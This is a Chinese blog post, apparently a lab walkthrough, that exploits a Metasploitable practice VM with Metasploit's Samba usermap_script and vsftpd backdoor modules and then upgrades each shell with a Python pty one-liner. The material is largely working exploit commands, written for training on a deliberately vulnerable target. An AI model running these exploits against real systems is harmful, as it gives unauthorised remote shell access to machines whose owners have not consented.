metasploitable靶场攻击

博主：执
发布时间：2024 年 12 月 28 日
62 次浏览
暂无评论
1210字数
分类：安全

usermap\_script 漏洞复现

进入控制台

msfconsole

title=

搜索 usermap\_script 模块

search usermap_script

title=

使用第一个模块

use 0

查看模块参数

show options

title=

设置靶机IP

set rhosts 192.168.91.160

开始攻击

run

title=

发现 +0800 字样，说明攻击成功了，但是发现没有回显

使用强大python库

python -c "import pty;pty.spawn('/bin/bash')"

ok 完美拿下

Vsftpd 源码包后门漏洞复现

进入控制台

msfconsole

搜索vsftp的漏洞利用模块

search vsftp

第二个是攻击模块，第一个是扫描模块

选择第二个

use 1

查看参数

show options

设置靶机IP

set rhosts 192.168.91.160

开始攻击

run

看到攻击成功了，使用python调出交互式界面

python -c "import pty;pty.spawn('/bin/bash')"

**拿下！**

最后修改：2024 年 12 月 28 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

metasploitable靶场攻击

执 • 2024 年 12 月 28 日

<h2>usermap\_script 漏洞复现</h2>&#x20;进入控制台<pre><code>msfconsole
</code></pre><img src="https://s2.loli.net/2024/12/27/k1yEh2V7oSpZxjF.png" alt=" title="1.png"" title=" title="1.png"" style="">搜索 usermap\_script 模块<pre><code>search usermap_script
</code></pre><img src="https://s2.loli.net/2024/12/27/aWCfMDYntmoH3Al.png" alt=" title="2.png"" title=" title="2.png"" style="">使用第一个模块<pre><code>use 0
</code></pre>查看模块参数<pre><code>show options
</code></pre><img src="https://s2.loli.net/2024/12/27/VXFqIw4mAYUS5Ox.png" alt=" title="3.png"" title=" title="3.png"" style="">设置靶机IP<pre><code>set rhosts 192.168.91.160
</code></pre>开始攻击<pre><code>run
</code></pre><img src="https://s2.loli.net/2024/12/27/SlimsrPTtw7X3uR.png" alt=" title="4.png"" title=" title="4.png"" style="">发现 +0800 字样，说明攻击成功了，但是发现没有回显使用强大python库<pre><code>python -c &quot;import pty;pty.spawn('/bin/bash')&quot;
</code></pre><img src="https://s2.loli.net/2024/12/27/sajE2DmVFfcx4Yw.png" alt="6.png" title="6.png" style="">ok 完美拿下<h2>&#x20;Vsftpd 源码包后门漏洞复现</h2>进入控制台<pre><code>msfconsole
</code></pre>搜索vsftp的漏洞利用模块<pre><code>search vsftp
</code></pre><img src="https://s2.loli.net/2024/12/27/ULdq57R2vYeuioM.png" alt="7.png" title="7.png" style="">第二个是攻击模块，第一个是扫描模块选择第二个<pre><code>use 1
</code></pre>查看参数<pre><code>show options
</code></pre>设置靶机IP<pre><code>set rhosts 192.168.91.160
</code></pre>开始攻击<pre><code>run
</code></pre><img src="https://s2.loli.net/2024/12/27/cCywEGV5YW1qZl2.png" alt="8.png" title="8.png" style="">看到攻击成功了，使用python调出交互式界面<pre><code>python -c &quot;import pty;pty.spawn('/bin/bash')&quot;
</code></pre><img src="https://s2.loli.net/2024/12/27/OtSq7BwXsj6ClNd.png" alt="9.png" title="9.png" style="">&#x20;**拿下 ！**

metasploitable靶场攻击

usermap\_script 漏洞复现

Vsftpd 源码包后门漏洞复现

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Typecho 404 not found 以及无法登陆的情况

信息收集-IP收集

VLAN基础

华为网络设备基础

常见WebShell的流量特征

信息收集-IP收集

华为网络设备基础

Typecho 404 not found 以及无法登陆的情况

萌新题

远程管理路由器

metasploitable靶场攻击

usermap\_script 漏洞复现

Vsftpd 源码包后门漏洞复现

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

metasploitable靶场攻击

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款